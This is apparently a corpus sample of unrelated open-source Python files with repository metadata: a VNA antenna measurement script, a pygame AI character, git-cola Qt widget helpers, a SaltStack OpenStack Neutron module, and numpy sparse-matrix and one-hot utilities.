SWEEP_CENTER = 15e6
SWEEP_SPAN = 20e6
SWEEP_POINTS = 1201
TX_STARTUP_DELAY = 2 # 20
BEAMS = 24
if __name__ == '__main__':
# setup arguement parser and parse arguements
parser = argparse.ArgumentParser()
parser.add_argument("--cal", action="count", help="run through calibration on VNA before taking measurements", default=0)
parser.add_argument("--vnaip", help="specify VNA ip address", default=VNAHOST)
parser.add_argument("--ddir", help="specify a directory to save the data in", default='adw_cable_short')
parser.add_argument("--avg", type=int, help="specify count to average", default=1)
parser.add_argument("--paths", type=int, help="specify number of paths to calibrate", default=20)
args = parser.parse_args()
# sanity check arguements
if args.avg < 1:
sys.exit("error: average count is less than 1")
if not os.path.exists(args.ddir):
sys.exit("error: data directory does not exist: %s" % (directory))
if args.paths < 1:
sys.exit("error: path count is less than 1")
# open connection with VNA
vna = lan_init(args.vnaip)
# preset VNA if calibrating
if args.cal:
vna_preset(vna)
# init VNA measurements
vna_init(vna, param='S22')
# configure VNA measurements (add smoothing to time delay channel, enable averaging)
vna_setspan(vna, SWEEP_SPAN, SWEEP_CENTER, SWEEP_POINTS)
vna_setave(vna,args.avg)
vna_enableave(vna,True)
vna_smoothapeture(vna,2,5.0)
vna_enablesmoothing(vna,2,True)
# calibrate VNA if run with --cal
if args.cal:
print 'calibrating VNA'
vna_through_cal(vna)
vna_trigger(vna, args.avg)
# setup csv data structure
csvdat = csv_data()
csvdat.sweep_count = SWEEP_POINTS
csvdat.ave_count = args.avg
csvdat.ave_enable = (args.avg > 1)
csvdat.smoothing_percent = 5
csvdat.smoothing_enable = True
csvdat.freqs = vna_readspan(vna)
csvdat.freq_start = min(csvdat.freqs)
csvdat.freq_end = max(csvdat.freqs)
# step through each path and measure phase, time delay, and magnitude at each beam setting
for p in range(args.paths):
p = int(raw_input('connect and enter a path number and then press enter to continue... '))
time.sleep(TX_STARTUP_DELAY) # wait for transmitter to warm up
csvdat.card = p
csvdat.beam = 0
vna_clearave(vna)
vna_trigger(vna, args.avg)
csvdat.tdelay = vna_readtimedelay(vna)
csvdat.ephase = vna_readextendedphase(vna)
csvdat.phase = vna_readphase(vna)
csvdat.mlog = vna_readmlog(vna)
write_csv(args.ddir, csvdat)
lan_close(vna)
|
loxodes/SuperDARN_Hardware_Tools
|
kingsalmon_scripts/antenna_grab.py
|
Python
|
gpl-2.0
| 3,161
|
import os
import sys
import random
import pygame
from Engine import *
from Montag import *
from Character import Character
from pygame.locals import *
class AICharacter(Character):
def __init__(self, screen, **kwargs):
super().__init__(screen, **kwargs)
self.enemy = kwargs.get("enemy", None)
self.movement_state = kwargs.get("movement_state", None)
self.waypoints = kwargs.get("waypoints", None)
self.area = kwargs.get("random_walk_area", None)
self.obstaclemap = kwargs.get("obstaclemap", None)
self.pathfinding_grid = self.obstaclemap.grid
self.dialog = kwargs.get("dialog", None)
self.dialogmanager = kwargs.get("dialogmanager", None)
if self.waypoints:
self.remaining_waypoints = self.waypoints.copy()
self.grid_pos = self.remaining_waypoints[0].copy()
self.walk_to_points = [self.remaining_waypoints.pop(0)]
self.movement_state = "waypoints"
self.state = "walk"
elif self.area:
self.movement_state = "random_walk"
self.pause_time = kwargs.get("pause_time", 1000)
self.pause_time_passed = 0
def click(self):
if self.dialog:
self.dialogmanager.start_dialog(self.dialog)
def hold_position(self):
self.movement_state = None
def update(self, current_time=None, event=None):
if not current_time:
current_time = pygame.time.get_ticks()
if self.state == "stand":
time_change = current_time - self.current_time
self.pause_time_passed += time_change
else:
self.pause_time_passed = 0
if not self.dead:
if not self.movement_temporarily_suppressed:
if not self.walk_to_points and self.pause_time_passed >= self.pause_time:
if self.movement_state == "random_walk":
self.walk_to_points = self.pathfinding_grid.find_path(self.grid_pos, [
random.uniform(self.area[0], self.area[0] + self.area[2]),
random.uniform(self.area[1], self.area[1] + self.area[3])])
self.frame = 0
elif self.movement_state == "waypoints":
if len(self.remaining_waypoints) == 0:
self.remaining_waypoints = self.waypoints.copy()
self.walk_to_points = [self.remaining_waypoints.pop(0)]
super().update(current_time, event)
if __name__ == "__main__":
pygame.init()
clock = pygame.time.Clock()
screen_info = pygame.display.Info()
screen_size = [screen_info.current_w, screen_info.current_h]
screen = pygame.display.set_mode(screen_size, RESIZABLE)
chars = []
b = Engine(screen)
b.load_tilemap("TheMap/map.floor", 0)
b.load_obstaclemap("TheMap/map.obstacles", 0)
montag = AICharacter(screen, "graphics/droids/blue_guard/atlas.txt", "graphics/droids/red_guard/config.txt", pathfinding_grid=b.obstacles.grid, pos=[3, 0], movement_state="random_walk", area=[5, 0, 10, 5])
while True:
current_time = pygame.time.get_ticks()
clock.tick(60)
screen.fill((0, 0, 0))
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == VIDEORESIZE:
screen_size = event.dict["size"]
screen = pygame.display.set_mode(screen_size, RESIZABLE)
else:
montag.update(current_time, event)
b.update()
b.draw([0, 0])
#chars.sort(key=lambda x: (x.pos[1], x.pos[0]))
montag.update(current_time)
montag.draw()
pygame.display.update()
|
lumidify/fahrenheit451
|
AICharacter.py
|
Python
|
gpl-2.0
| 3,797
|
from __future__ import division, absolute_import, unicode_literals
import time
from qtpy import QtCore
from qtpy import QtGui
from qtpy import QtWidgets
from qtpy.QtCore import Qt
from qtpy.QtCore import Signal
from qtpy.QtWidgets import QDockWidget
from .. import core
from .. import gitcfg
from .. import qtcompat
from .. import qtutils
from .. import utils
from ..settings import Settings
from . import defs
class WidgetMixin(object):
"""Mix-in for common utilities and serialization of widget state"""
def __init__(self):
self._unmaximized_size = None
def center(self):
parent = self.parent()
if parent is None:
return
left = parent.x()
width = parent.width()
center_x = left + width//2
x = center_x - self.width()//2
y = parent.y()
self.move(x, y)
def resize_to_desktop(self):
desktop = QtWidgets.QApplication.instance().desktop()
width = desktop.width()
height = desktop.height()
if utils.is_darwin():
self.resize(width, height)
else:
shown = self.isVisible()
# earlier show() fools Windows focus stealing prevention. the main
# window is blocked for the duration of "git rebase" and we don't
# want to present a blocked window with git-xbase hidden somewhere.
self.show()
self.setWindowState(Qt.WindowMaximized)
if not shown:
self.hide()
def name(self):
"""Returns the name of the view class"""
return self.__class__.__name__.lower()
def save_state(self, settings=None):
if settings is None:
settings = Settings()
settings.load()
if gitcfg.current().get('cola.savewindowsettings', True):
settings.save_gui_state(self)
def resizeEvent(self, event):
super(WidgetMixin, self).resizeEvent(event)
# Use a timer to so that the window size and state is up to date.
# If we ask for the window state here it will never realize that
# we have been maximized because the window state change is processed
# after the resize event. Using a timer event causes it to happen
# after all the events have been processsed.
size = event.size()
QtCore.QTimer.singleShot(1, lambda: self._store_unmaximized_size(size))
def _store_unmaximized_size(self, size):
state = self.windowState()
maximized = bool(state & Qt.WindowMaximized)
if not maximized:
width, height = size.width(), size.height()
if width > 0 and height > 0:
self._unmaximized_size = (width, height)
def restore_state(self, settings=None):
if settings is None:
settings = Settings()
settings.load()
state = settings.get_gui_state(self)
return bool(state) and self.apply_state(state)
def apply_state(self, state):
"""Imports data for view save/restore"""
result = True
try:
self.resize(state['width'], state['height'])
except:
result = False
try:
self.move(state['x'], state['y'])
except:
result = False
try:
if state['maximized']:
self.showMaximized()
try:
self._unmaximized_size = (state['width'], state['height'])
except:
pass
except:
result = False
self._apply_state_applied = result
return result
def export_state(self):
"""Exports data for view save/restore"""
state = self.windowState()
maximized = bool(state & Qt.WindowMaximized)
# when maximized we don't want to overwrite saved width/height with
# desktop dimensions.
if maximized and self._unmaximized_size:
width, height = self._unmaximized_size
else:
width, height = self.width(), self.height()
return {
'x': self.x(),
'y': self.y(),
'width': width,
'height': height,
'maximized': maximized,
}
def save_settings(self):
settings = Settings()
settings.load()
settings.add_recent(core.getcwd())
return self.save_state(settings=settings)
def closeEvent(self, event):
self.save_settings()
self.Base.closeEvent(self, event)
def init_state(self, settings, callback, *args, **kwargs):
"""Restore saved settings or set the initial location"""
if not self.restore_state(settings=settings):
callback(*args, **kwargs)
self.center()
class MainWindowMixin(WidgetMixin):
def __init__(self):
WidgetMixin.__init__(self)
# Dockwidget options
self.dockwidgets = []
self.lock_layout = False
self.widget_version = 0
qtcompat.set_common_dock_options(self)
def export_state(self):
"""Exports data for save/restore"""
state = WidgetMixin.export_state(self)
windowstate = self.saveState(self.widget_version)
state['lock_layout'] = self.lock_layout
state['windowstate'] = windowstate.toBase64().data().decode('ascii')
return state
def apply_state(self, state):
result = WidgetMixin.apply_state(self, state)
windowstate = state.get('windowstate', None)
if windowstate is None:
result = False
else:
from_base64 = QtCore.QByteArray.fromBase64
result = self.restoreState(
from_base64(core.encode(windowstate)),
self.widget_version) and result
self.lock_layout = state.get('lock_layout', self.lock_layout)
self.update_dockwidget_lock_state()
self.update_dockwidget_tooltips()
return result
def set_lock_layout(self, lock_layout):
self.lock_layout = lock_layout
self.update_dockwidget_lock_state()
def update_dockwidget_lock_state(self):
if self.lock_layout:
features = (QDockWidget.DockWidgetClosable |
QDockWidget.DockWidgetFloatable)
else:
features = (QDockWidget.DockWidgetClosable |
QDockWidget.DockWidgetFloatable |
QDockWidget.DockWidgetMovable)
for widget in self.dockwidgets:
widget.titleBarWidget().update_tooltips()
widget.setFeatures(features)
def update_dockwidget_tooltips(self):
for widget in self.dockwidgets:
widget.titleBarWidget().update_tooltips()
class TreeMixin(object):
def __init__(self, widget, Base):
self.widget = widget
self.Base = Base
widget.setAlternatingRowColors(True)
widget.setUniformRowHeights(True)
widget.setAllColumnsShowFocus(True)
widget.setAnimated(True)
widget.setRootIsDecorated(False)
def keyPressEvent(self, event):
"""
Make LeftArrow to work on non-directories.
When LeftArrow is pressed on a file entry or an unexpanded
directory, then move the current index to the parent directory.
This simplifies navigation using the keyboard.
For power-users, we support Vim keybindings ;-P
"""
# Check whether the item is expanded before calling the base class
# keyPressEvent otherwise we end up collapsing and changing the
# current index in one shot, which we don't want to do.
widget = self.widget
index = widget.currentIndex()
was_expanded = widget.isExpanded(index)
was_collapsed = not was_expanded
# Vim keybindings...
# Rewrite the event before marshalling to QTreeView.event()
key = event.key()
# Remap 'H' to 'Left'
if key == Qt.Key_H:
event = QtGui.QKeyEvent(event.type(),
Qt.Key_Left,
event.modifiers())
# Remap 'J' to 'Down'
elif key == Qt.Key_J:
event = QtGui.QKeyEvent(event.type(),
Qt.Key_Down,
event.modifiers())
# Remap 'K' to 'Up'
elif key == Qt.Key_K:
event = QtGui.QKeyEvent(event.type(),
Qt.Key_Up,
event.modifiers())
# Remap 'L' to 'Right'
elif key == Qt.Key_L:
event = QtGui.QKeyEvent(event.type(),
Qt.Key_Right,
event.modifiers())
# Re-read the event key to take the remappings into account
key = event.key()
if key == Qt.Key_Up:
idxs = widget.selectedIndexes()
rows = [idx.row() for idx in idxs]
if len(rows) == 1 and rows[0] == 0:
# The cursor is at the beginning of the line.
# If we have selection then simply reset the cursor.
# Otherwise, emit a signal so that the parent can
# change focus.
widget.up.emit()
elif key == Qt.Key_Space:
widget.space.emit()
result = self.Base.keyPressEvent(widget, event)
# Let others hook in here before we change the indexes
widget.index_about_to_change.emit()
# Automatically select the first entry when expanding a directory
if (key == Qt.Key_Right and was_collapsed and
widget.isExpanded(index)):
index = widget.moveCursor(widget.MoveDown, event.modifiers())
widget.setCurrentIndex(index)
# Process non-root entries with valid parents only.
elif key == Qt.Key_Left and index.parent().isValid():
# File entries have rowCount() == 0
if widget.model().itemFromIndex(index).rowCount() == 0:
widget.setCurrentIndex(index.parent())
# Otherwise, do this for collapsed directories only
elif was_collapsed:
widget.setCurrentIndex(index.parent())
# If it's a movement key ensure we have a selection
elif key in (Qt.Key_Left, Qt.Key_Up, Qt.Key_Right, Qt.Key_Down):
# Try to select the first item if the model index is invalid
item = self.selected_item()
if item is None or not index.isValid():
index = widget.model().index(0, 0, QtCore.QModelIndex())
if index.isValid():
widget.setCurrentIndex(index)
return result
def items(self):
root = self.widget.invisibleRootItem()
child = root.child
count = root.childCount()
return [child(i) for i in range(count)]
def selected_items(self):
"""Return all selected items"""
widget = self.widget
if hasattr(widget, 'selectedItems'):
return widget.selectedItems()
else:
item_from_index = widget.model().itemFromIndex
return [item_from_index(i) for i in widget.selectedIndexes()]
def selected_item(self):
"""Return the first selected item"""
selected_items = self.selected_items()
if not selected_items:
return None
return selected_items[0]
def current_item(self):
item = None
widget = self.widget
if hasattr(widget, 'currentItem'):
item = widget.currentItem()
else:
index = widget.currentIndex()
if index.isValid():
item = widget.model().itemFromIndex(index)
return item
class DraggableTreeMixin(TreeMixin):
"""A tree widget with internal drag+drop reordering of rows
Expects that the widget provides an `items_moved` signal.
"""
def __init__(self, widget, Base):
super(DraggableTreeMixin, self).__init__(widget, Base)
self._inner_drag = False
widget.setAcceptDrops(True)
widget.setSelectionMode(widget.SingleSelection)
widget.setDragEnabled(True)
widget.setDropIndicatorShown(True)
widget.setDragDropMode(QtWidgets.QAbstractItemView.InternalMove)
widget.setSortingEnabled(False)
def dragEnterEvent(self, event):
"""Accept internal drags only"""
widget = self.widget
self.Base.dragEnterEvent(widget, event)
self._inner_drag = event.source() == widget
if self._inner_drag:
event.acceptProposedAction()
else:
event.ignore()
def dragLeaveEvent(self, event):
widget = self.widget
self.Base.dragLeaveEvent(widget, event)
if self._inner_drag:
event.accept()
else:
event.ignore()
self._inner_drag = False
def dropEvent(self, event):
"""Re-select selected items after an internal move"""
if not self._inner_drag:
event.ignore()
return
widget = self.widget
clicked_items = self.selected_items()
event.setDropAction(Qt.MoveAction)
self.Base.dropEvent(widget, event)
if clicked_items:
widget.clearSelection()
for item in clicked_items:
item.setSelected(True)
widget.items_moved.emit(clicked_items)
self._inner_drag = False
event.accept() # must be called after dropEvent()
def mousePressEvent(self, event):
"""Clear the selection when a mouse click hits no item"""
widget = self.widget
clicked_item = widget.itemAt(event.pos())
if clicked_item is None:
widget.clearSelection()
return self.Base.mousePressEvent(widget, event)
class Widget(WidgetMixin, QtWidgets.QWidget):
Base = QtWidgets.QWidget
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
WidgetMixin.__init__(self)
class Dialog(WidgetMixin, QtWidgets.QDialog):
Base = QtWidgets.QDialog
def __init__(self, parent=None, save_settings=False):
QtWidgets.QDialog.__init__(self, parent)
WidgetMixin.__init__(self)
self._save_settings = save_settings
def reject(self):
if self._save_settings:
self.save_settings()
return self.Base.reject(self)
class MainWindow(MainWindowMixin, QtWidgets.QMainWindow):
Base = QtWidgets.QMainWindow
def __init__(self, parent=None):
QtWidgets.QMainWindow.__init__(self, parent)
MainWindowMixin.__init__(self)
self.setStyleSheet("""
QMainWindow::separator {
width: %(separator)spx;
height: %(separator)spx;
}
QMainWindow::separator:hover {
background: white;
}
""" % dict(separator=defs.separator))
class TreeView(QtWidgets.QTreeView):
Mixin = TreeMixin
up = Signal()
space = Signal()
index_about_to_change = Signal()
def __init__(self, parent=None):
QtWidgets.QTreeView.__init__(self, parent)
self._mixin = self.Mixin(self, QtWidgets.QTreeView)
def keyPressEvent(self, event):
return self._mixin.keyPressEvent(event)
def current_item(self):
return self._mixin.current_item()
def selected_item(self):
return self._mixin.selected_item()
def selected_items(self):
return self._mixin.selected_items()
def items(self):
return self._mixin.items()
class TreeWidget(QtWidgets.QTreeWidget):
Mixin = TreeMixin
up = Signal()
space = Signal()
index_about_to_change = Signal()
def __init__(self, parent=None):
super(TreeWidget, self).__init__(parent)
self._mixin = self.Mixin(self, QtWidgets.QTreeWidget)
def keyPressEvent(self, event):
return self._mixin.keyPressEvent(event)
def current_item(self):
return self._mixin.current_item()
def selected_item(self):
return self._mixin.selected_item()
def selected_items(self):
return self._mixin.selected_items()
def items(self):
return self._mixin.items()
class DraggableTreeWidget(TreeWidget):
Mixin = DraggableTreeMixin
items_moved = Signal(object)
def mousePressEvent(self, event):
return self._mixin.mousePressEvent(event)
def dropEvent(self, event):
return self._mixin.dropEvent(event)
def dragLeaveEvent(self, event):
return self._mixin.dragLeaveEvent(event)
def dragEnterEvent(self, event):
return self._mixin.dragEnterEvent(event)
class ProgressDialog(QtWidgets.QProgressDialog):
"""Custom progress dialog
This dialog ignores the ESC key so that it is not
prematurely closed.
An thread is spawned to animate the progress label text.
"""
def __init__(self, title, label, parent):
QtWidgets.QProgressDialog.__init__(self, parent)
if parent is not None:
self.setWindowModality(Qt.WindowModal)
self.reset()
self.setRange(0, 0)
self.setMinimumDuration(0)
self.setCancelButton(None)
self.setFont(qtutils.diff_font())
self.thread = ProgressAnimationThread(label, self)
self.thread.updated.connect(self.refresh, type=Qt.QueuedConnection)
self.set_details(title, label)
def set_details(self, title, label):
self.setWindowTitle(title)
self.setLabelText(label + ' ')
self.thread.set_text(label)
def refresh(self, txt):
self.setLabelText(txt)
def keyPressEvent(self, event):
if event.key() != Qt.Key_Escape:
super(ProgressDialog, self).keyPressEvent(event)
def show(self):
QtWidgets.QApplication.setOverrideCursor(Qt.WaitCursor)
super(ProgressDialog, self).show()
self.thread.start()
def hide(self):
QtWidgets.QApplication.restoreOverrideCursor()
self.thread.stop()
self.thread.wait()
super(ProgressDialog, self).hide()
class ProgressAnimationThread(QtCore.QThread):
"""Emits a pseudo-animated text stream for progress bars
"""
updated = Signal(object)
def __init__(self, txt, parent, timeout=0.1):
QtCore.QThread.__init__(self, parent)
self.running = False
self.txt = txt
self.timeout = timeout
self.symbols = [
'. ..',
'.. .',
'... ',
' ... ',
' ...',
]
self.idx = -1
def set_text(self, txt):
self.txt = txt
def cycle(self):
self.idx = (self.idx + 1) % len(self.symbols)
return self.txt + self.symbols[self.idx]
def stop(self):
self.running = False
def run(self):
self.running = True
while self.running:
self.updated.emit(self.cycle())
time.sleep(self.timeout)
class SpinBox(QtWidgets.QSpinBox):
def __init__(self, parent=None):
QtWidgets.QSpinBox.__init__(self, parent)
self.setMinimum(1)
self.setMaximum(99999)
self.setPrefix('')
self.setSuffix('')
|
sthalik/git-cola
|
cola/widgets/standard.py
|
Python
|
gpl-2.0
| 19,289
|
# -*- coding: utf-8 -*-
'''
Module for handling openstack neutron calls.
:maintainer: <akilesh1597@gmail.com>
:maturity: new
:platform: all
:optdepends: - neutronclient Python adapter
:configuration: This module is not usable until the following are specified
either in a pillar or in the minion's config file::
keystone.user: admin
keystone.password: verybadpass
keystone.tenant: admin
keystone.tenant_id: f80919baedab48ec8931f200c65a50df
keystone.insecure: False #(optional)
keystone.auth_url: 'http://127.0.0.1:5000/v2.0/'
If configuration for multiple openstack accounts is required, they can be
set up as different configuration profiles:
For example::
openstack1:
keystone.user: admin
keystone.password: verybadpass
keystone.tenant: admin
keystone.tenant_id: f80919baedab48ec8931f200c65a50df
keystone.auth_url: 'http://127.0.0.1:5000/v2.0/'
openstack2:
keystone.user: admin
keystone.password: verybadpass
keystone.tenant: admin
keystone.tenant_id: f80919baedab48ec8931f200c65a50df
keystone.auth_url: 'http://127.0.0.2:5000/v2.0/'
With this configuration in place, any of the neutron functions can make
use of a configuration profile by declaring it explicitly.
For example::
salt '*' neutron.list_subnets profile=openstack1
Please check 'https://wiki.openstack.org/wiki/Neutron/APIv2-specification'
for the correct arguments to the api
'''
import logging
from functools import wraps
LOG = logging.getLogger(__name__)
# Import third party libs
HAS_NEUTRON = False
try:
from neutronclient.v2_0 import client
HAS_NEUTRON = True
except ImportError:
pass
__opts__ = {}
def __virtual__():
'''
Only load this module if neutron
is installed on this minion.
'''
if HAS_NEUTRON:
return 'neutron'
return False
def _autheticate(func_name):
'''
Authenticate requests with the salt keystone module and format return data
'''
@wraps(func_name)
def decorator_method(*args, **kwargs):
'''
Authenticate request and format return data
'''
connection_args = {'profile': kwargs.get('profile', None)}
nkwargs = {}
for kwarg in kwargs:
if 'connection_' in kwarg:
connection_args.update({kwarg: kwargs[kwarg]})
elif '__' not in kwarg:
nkwargs.update({kwarg: kwargs[kwarg]})
kstone = __salt__['keystone.auth'](**connection_args)
token = kstone.auth_token
endpoint = kstone.service_catalog.url_for(
service_type='network',
endpoint_type='publicURL')
neutron_interface = client.Client(
endpoint_url=endpoint, token=token)
LOG.error('calling with args ' + str(args))
LOG.error('calling with kwargs ' + str(nkwargs))
return_data = func_name(neutron_interface, *args, **nkwargs)
LOG.error('got return data ' + str(return_data))
if isinstance(return_data, list):
# format list as a dict for rendering
return {data.get('name', None) or data['id']: data
for data in return_data}
return return_data
return decorator_method
@_autheticate
def list_floatingips(neutron_interface, **kwargs):
'''
list all floatingips
CLI Example:
.. code-block:: bash
salt '*' neutron.list_floatingips
'''
return neutron_interface.list_floatingips(**kwargs)['floatingips']
@_autheticate
def list_security_groups(neutron_interface, **kwargs):
'''
list all security_groups
CLI Example:
.. code-block:: bash
salt '*' neutron.list_security_groups
'''
return neutron_interface.list_security_groups(**kwargs)['security_groups']
@_autheticate
def list_subnets(neutron_interface, **kwargs):
'''
list all subnets
CLI Example:
.. code-block:: bash
salt '*' neutron.list_subnets
'''
return neutron_interface.list_subnets(**kwargs)['subnets']
@_autheticate
def list_networks(neutron_interface, **kwargs):
'''
list all networks
CLI Example:
.. code-block:: bash
salt '*' neutron.list_networks
'''
return neutron_interface.list_networks(**kwargs)['networks']
@_autheticate
def list_ports(neutron_interface, **kwargs):
'''
list all ports
CLI Example:
.. code-block:: bash
salt '*' neutron.list_ports
'''
return neutron_interface.list_ports(**kwargs)['ports']
@_autheticate
def list_routers(neutron_interface, **kwargs):
'''
list all routers
CLI Example:
.. code-block:: bash
salt '*' neutron.list_routers
'''
return neutron_interface.list_routers(**kwargs)['routers']
@_autheticate
def update_floatingip(neutron_interface, fip, port_id=None):
'''
update floating IP. Should be used to associate and disassociate
floating IP with instance
CLI Example:
.. code-block:: bash
to associate with an instance's port
salt '*' neutron.update_floatingip openstack-floatingip-id port-id
to disassociate from an instance's port
salt '*' neutron.update_floatingip openstack-floatingip-id
'''
neutron_interface.update_floatingip(fip, {"floatingip":
{"port_id": port_id}})
@_autheticate
def update_subnet(neutron_interface, subnet_id, **subnet_params):
'''
update given subnet
CLI Example:
.. code-block:: bash
salt '*' neutron.update_subnet openstack-subnet-id name='new_name'
'''
neutron_interface.update_subnet(subnet_id, {'subnet': subnet_params})
@_autheticate
def update_router(neutron_interface, router_id, **router_params):
'''
update given router
CLI Example:
.. code-block:: bash
salt '*' neutron.update_router openstack-router-id name='new_name'
external_gateway='openstack-network-id' administrative_state=true
'''
neutron_interface.update_router(router_id, {'router': router_params})
@_autheticate
def router_gateway_set(neutron_interface, router_id, external_gateway):
'''
Set external gateway for a router
CLI Example:
.. code-block:: bash
salt '*' neutron.update_router openstack-router-id openstack-network-id
'''
neutron_interface.update_router(
router_id, {'router': {'external_gateway_info':
{'network_id': external_gateway}}})
@_autheticate
def router_gateway_clear(neutron_interface, router_id):
'''
Clear external gateway for a router
CLI Example:
.. code-block:: bash
salt '*' neutron.update_router openstack-router-id
'''
neutron_interface.update_router(
router_id, {'router': {'external_gateway_info': None}})
@_autheticate
def create_router(neutron_interface, **router_params):
'''
Create OpenStack Neutron router
CLI Example:
.. code-block:: bash
salt '*' neutron.create_router name=R1
'''
response = neutron_interface.create_router({'router': router_params})
if 'router' in response and 'id' in response['router']:
return response['router']['id']
@_autheticate
def router_add_interface(neutron_interface, router_id, subnet_id):
'''
Attach router to a subnet
CLI Example:
.. code-block:: bash
salt '*' neutron.router_add_interface openstack-router-id subnet-id
'''
neutron_interface.add_interface_router(router_id, {'subnet_id': subnet_id})
@_autheticate
def router_rem_interface(neutron_interface, router_id, subnet_id):
'''
Dettach router from a subnet
CLI Example:
.. code-block:: bash
salt '*' neutron.router_rem_interface openstack-router-id subnet-id
'''
neutron_interface.remove_interface_router(
router_id, {'subnet_id': subnet_id})
@_autheticate
def create_security_group(neutron_interface, **sg_params):
'''
Create a new security group
CLI Example:
.. code-block:: bash
salt '*' neutron.create_security_group name='new_rule'
description='test rule'
'''
response = neutron_interface.create_security_group(
{'security_group': sg_params})
if 'security_group' in response and 'id' in response['security_group']:
return response['security_group']['id']
@_autheticate
def create_security_group_rule(neutron_interface, **rule_params):
'''
Create a rule entry for a security group
CLI Example:
.. code-block:: bash
salt '*' neutron.create_security_group_rule
'''
neutron_interface.create_security_group_rule(
{'security_group_rule': rule_params})
@_autheticate
def create_floatingip(neutron_interface, **floatingip_params):
'''
Create a new floating IP
CLI Example:
.. code-block:: bash
salt '*' neutron.create_floatingip floating_network_id=ext-net-id
'''
response = neutron_interface.create_floatingip(
{'floatingip': floatingip_params})
if 'floatingip' in response and 'id' in response['floatingip']:
return response['floatingip']['id']
@_autheticate
def create_subnet(neutron_interface, **subnet_params):
'''
Create a new subnet in OpenStack
CLI Example:
.. code-block:: bash
salt '*' neutron.create_subnet name='subnet name'
network_id='openstack-network-id' cidr='192.168.10.0/24' \\
gateway_ip='192.168.10.1' ip_version='4' enable_dhcp=false \\
start_ip='192.168.10.10' end_ip='192.168.10.20'
'''
if 'start_ip' in subnet_params:
subnet_params.update(
{'allocation_pools': [{'start': subnet_params.pop('start_ip'),
'end': subnet_params.pop('end_ip', None)}]})
response = neutron_interface.create_subnet({'subnet': subnet_params})
if 'subnet' in response and 'id' in response['subnet']:
return response['subnet']['id']
@_autheticate
def create_network(neutron_interface, **network_params):
'''
Create a new network segment in OpenStack
CLI Example:
.. code-block:: bash
salt '*' neutron.create_network name=External
provider_network_type=flat provider_physical_network=ext
'''
network_params = {param.replace('_', ':', 1):
network_params[param] for param in network_params}
response = neutron_interface.create_network({'network': network_params})
if 'network' in response and 'id' in response['network']:
return response['network']['id']
@_autheticate
def create_port(neutron_interface, **port_params):
'''
Create a new port in OpenStack
CLI Example:
.. code-block:: bash
salt '*' neutron.create_port network_id='openstack-network-id'
'''
response = neutron_interface.create_port({'port': port_params})
if 'port' in response and 'id' in response['port']:
return response['port']['id']
@_autheticate
def update_port(neutron_interface, port_id, **port_params):
'''
Create a new port in OpenStack
CLI Example:
.. code-block:: bash
salt '*' neutron.update_port name='new_port_name'
'''
neutron_interface.update_port(port_id, {'port': port_params})
@_autheticate
def delete_floatingip(neutron_interface, floating_ip_id):
'''
delete a floating IP
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_floatingip openstack-floating-ip-id
'''
neutron_interface.delete_floatingip(floating_ip_id)
@_autheticate
def delete_security_group(neutron_interface, sg_id):
'''
delete a security group
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_security_group openstack-security-group-id
'''
neutron_interface.delete_security_group(sg_id)
@_autheticate
def delete_security_group_rule(neutron_interface, rule):
'''
delete a security group rule. pass all rule params that match the rule
to be deleted
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_security_group_rule direction='ingress'
ethertype='ipv4' security_group_id='openstack-security-group-id'
port_range_min=100 port_range_max=4096 protocol='tcp'
remote_group_id='default'
'''
sg_rules = neutron_interface.list_security_group_rules(
security_group_id=rule['security_group_id'])
for sg_rule in sg_rules['security_group_rules']:
sgr_id = sg_rule.pop('id')
if sg_rule == rule:
neutron_interface.delete_security_group_rule(sgr_id)
@_autheticate
def delete_subnet(neutron_interface, subnet_id):
'''
delete given subnet
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_subnet openstack-subnet-id
'''
neutron_interface.delete_subnet(subnet_id)
@_autheticate
def delete_network(neutron_interface, network_id):
'''
delete given network
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_network openstack-network-id
'''
neutron_interface.delete_network(network_id)
@_autheticate
def delete_router(neutron_interface, router_id):
'''
delete given router
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_router openstack-router-id
'''
neutron_interface.delete_router(router_id)
|
CSSCorp/openstack-automation
|
file_root/_modules/neutron.py
|
Python
|
gpl-2.0
| 13,539
|
import numpy as np
from scipy.sparse import csr_matrix, coo_matrix
def save_sparse_csr(filename,array):
np.savez(filename,data = array.data ,indices=array.indices,
indptr =array.indptr, shape=array.shape )
def load_sparse_csr(filename):
loader = np.load(filename)
return csr_matrix(( loader['data'], loader['indices'], loader['indptr']),
shape = loader['shape'])
def save_arr_assparse(filename, array):
return save_sparse_csr(filename, csr_matrix(array))
def load_sparse_asarr(filename):
return load_sparse_csr(filename).toarray()
def to_onehot(Y, vector_size):
Y_vec = []
# Now y should be converted to one hot vector for each index value
for i in xrange(len(Y)):
Y_vec.append([])
for j in xrange(len(Y[0])):
y_vec = np.zeros(vector_size)
y_vec[Y[i][j]] = 1
Y_vec[-1].append(y_vec)
return np.array(Y_vec, dtype='int32')
def to_onehot_char(X, vector_size):
X_vec = np.zeros(X.shape + (vector_size,))
for i in xrange(X_vec.shape[0]):
for j in xrange(X_vec.shape[1]):
for k in xrange(X_vec.shape[2]):
try:
X_vec[i,j,k,X[i,j,k]] = 1
except:
print X_vec.shape, X.shape, (i, j, k), X[i,j,k]
raise Exception
return X_vec
def onehot_to_idxarr(Y):
return Y.argmax(axis=len(Y.shape) - 1)
def confusion_matrix(y_pred, y_true, labels=None):
# Send only filtered y values.
y_pred, y_true = np.array(y_pred).flatten().squeeze(), np.array(y_true).flatten().squeeze()
if labels is None:
labels = list(set(y_true).union(set(y_pred)))
n_labels = len(labels)
print "[%s] labels = %s" % (n_labels, labels)
CM = coo_matrix((np.ones_like(y_true, dtype="int"), (y_true, y_pred)), shape=(n_labels, n_labels)).todense()
return CM
def get_prf_scores(cm):
scores = dict()
TP = np.diag(cm)
FP = np.squeeze(np.asarray((np.sum(cm, axis=1)))) - TP
FN = np.squeeze(np.asarray((np.sum(cm, axis=0)))) - TP
scores["TP"] = TP
scores["FP"] = FP
scores["FN"] = FN
precision = TP * 1. / (TP + FP)
recall = TP * 1. / (TP + FN)
f1_score = 2*precision*recall / (precision + recall)
macro_f1 = np.mean(f1_score)
scores["precision"] = precision
scores["recall"] = recall
scores["f1_score"] = f1_score
scores["macro_f1"] = macro_f1
